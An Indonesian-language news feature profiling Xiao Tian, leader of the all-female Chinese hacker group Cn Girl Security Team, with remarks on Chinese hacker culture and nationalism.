“Serangan-serangan ini membuat kami memutuskan untuk meninjau kelayakan operasi bisnis kami di China,” sebut Drummond blog resmi Google, 12 Januari 2011.

Langkah Google yang memilih mundur dari China menunjukkan dahsyatnya komunitas hacker di negeri tersebut.

Sampai Juli 2008, diperkirakan terdapat 4 juta orang hacker yang tergabung dalam berbagai komunitas hacker. Salah satunya adalah kelompok hacker khusus wanita yang menamakan diri Cn Girl Security Team.

Kelompok hacker ini dipimpin oleh gadis kelahiran Hunan, 6 September 1989 bernama Xiao Tian.

Dalam benak, kita mungkin membayangkan bahwa tipikal seorang hacker adalah remaja yang beranjak dewasa, dengan penampilan seadanya – kalau tidak dibilang buruk rupa – dengan kacamata tebal, perokok berat, rambut acak-acakan tak terawat dan jarang mandi karena menghabiskan sebagian besar hidupnya di depan komputer.

Ternyata tidak demikian dengan Xiao Tian. Meski menyebutkan ia sering begadang dan sesekali merokok, tetapi penampilannya sangat apik. Sepintas, melihat penampilannya, Anda mungkin tak akan menyangka bahwa ia merupakan pimpinan dari kelompok hacker yang anggotanya mencapai lebih dari 2.200 orang hacker wanita.

Xiao Tian menyebutkan, ia membuat kelompok tersebut karena ia merasa bahwa perlu ada tempat bagi gadis remaja sepertinya, yang merasa tersingkirkan dari dunia hacker yang disesaki oleh hacker pria yang menganggap bahwa hacker wanita tidak memiliki skill yang cukup.

Perlahan tapi pasti, Xiao Tian dan kelompok hackernya mulai menerobos dominasi pria di dunia hacking. Mereka mengincar status selebritis yang disandang oleh para hacker di China sekaligus membuka peluang ‘karir’ yang menggiurkan yang tersedia bagi hacker yang memiliki reputasi tinggi.

Meski anggota klub hacker Xiao Tian masih relatif kecil dibandingkan dengan populasi hacker di China, akan tetapi ‘organisasi’ hackernya mungkin merupakan salah satu kelompok hacker perempuan terbesar di China.

Scott Henderson, seorang pensiunan tentara AS yang merupakan pengamat dan penulis The Dark Visitor: Inside the World of Chinese Hackers pernah menyebutkan pada DNA India. “Aspek unik dari hacker China adalah rasa nasionalisme dan kolektivitas. Ini kontras dengan stereotip hacker barat yang umumnya mandiri dan bekerja secara individual di ruang bawah tanah tempat tinggal mereka,” ucapnya.

Akan tetapi, belakangan, kecenderungan yang terjadi adalah ‘tentara cyber’ tersebut terpecah-pecah dan membentuk kriminal kapitalis dan mulai meninggalkan rasa nasionalisme mereka.

Meski demikian, Henderson menyebutkan, suatu saat jika ada konflik yang melibatkan China, hacker tentu akan memobilisasi kelompok mereka dan terlibat dalam perang dunia maya. Dan jika saatnya tiba, ‘jenderal’ Xiao Tian mungkin akan menjadi salah satu pemimpin pasukan tentara China tersebut.

Read More